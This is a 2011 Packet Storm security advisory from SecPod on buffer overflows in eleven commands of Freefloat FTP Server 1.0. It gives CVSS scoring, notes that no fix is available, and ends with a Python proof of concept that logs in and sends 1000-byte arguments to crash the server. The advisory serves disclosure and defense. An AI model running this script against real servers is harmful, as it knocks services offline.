Freefloat FTP Server 1.0 Buffer Overflow

2011-08-05T00:00:00
ID PACKETSTORM:103746
Type packetstorm
Reporter Veerendra G.G
Modified 2011-08-05T00:00:00

Description

                                        
                                            `###############################################################################  
Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities  
  
SecPod Technologies (www.secpod.com)  
Author: Veerendra G.G  
###############################################################################  
  
SecPod ID: 1019 19/07/2011 Issue Discovered  
19/07/2011 Vendor Notified  
No Response From Vendor  
04/08/2011 Advisory Released  
  
  
Class: Buffer Overflow Severity: High  
  
  
Overview:  
---------  
Freefloat FTP Server Version 1.0 is prone to multiple Commands Buffer Overflow  
vulnerabilities.  
  
  
Technical Description:  
----------------------  
The flaws are caused due to input validation errors while processing DELE,  
MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. These  
can be exploited by sending an overly long command argument causing the  
buffer to overflow.  
  
  
Impact:  
--------  
Successful exploitation may allow remote attackers to execute arbitrary code  
or cause a denial of service condition.  
  
  
Affected Software:  
------------------  
Freefloat FTP Server Version 1.0  
  
  
Tested on:  
-----------  
Freefloat FTP Server Version 1.0 on Windows XP SP3 En.  
  
  
References:  
-----------  
http://secpod.org/blog/?p=310  
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt  
http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php  
  
  
Proof of Concept:  
----------------  
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
  
(or see below)  
  
  
  
Solution:  
----------  
Not available  
  
  
Risk Factor:  
-------------  
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = LOW   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = PARTIAL   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = COMPLETE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 8.0 (AV:N/AC:L/Au:SI/C:P/I:P/A:C)   
CVSS Temporal Score = 7.2   
Risk factor = High   
  
  
Credits:  
--------  
Veerendra G.G of SecPod Technologies has been credited with the discovery of  
this vulnerability.  
  
  
============================================================  
  
  
#!/usr/bin/python  
##############################################################################  
# Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities  
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)  
# Vendor : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php  
# Advisory : http://secpod.org/blog/?p=310  
# http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
# http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt  
# Version : Freefloat FTP Server Version 1.0  
# Date : 21/07/2011  
##############################################################################  
  
import sys, socket  
  
  
def exploit(HOST, PORT, CMD):  
try:  
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
tcp_sock.connect((HOST, PORT))  
except Exception, msg:  
print "[-] Not able to connect to : " , HOST  
sys.exit(0)  
  
res = tcp_sock.recv(1024)  
  
if "220 FreeFloat" not in res:  
print "[-] FreeFloat FTP Server Not Found..."  
tcp_sock.close()  
sys.exit(0)  
  
tcp_sock.send("USER test\r\n")  
tcp_sock.recv(1024)  
tcp_sock.send("PASS test\r\n")  
tcp_sock.recv(1024)  
  
tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")  
tcp_sock.close()  
  
  
if __name__ == "__main__":  
  
if len(sys.argv) < 2:  
print "\t[-] Usage: python exploit.py target_ip"  
print "\t[-] Example : python exploit.py 127.0.0.1"  
print "\t[-] Exiting..."  
sys.exit(0)  
  
HOST = sys.argv[1]  
PORT = 21  
  
## Vulnerable Commands  
CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",  
"RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]  
  
for CMD in CMDs:  
print "[+] Connecting with server..."  
exploit(HOST, PORT, CMD)  
print "[+] Exploit Sent with %s command..." %(CMD)  
print "[+] Checking Server Crashed or not..."  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((HOST, PORT))  
s.close()  
except Exception, msg:  
print "[+] Server Crashed with %s Command" %(CMD)  
sys.exit(0)  
  
`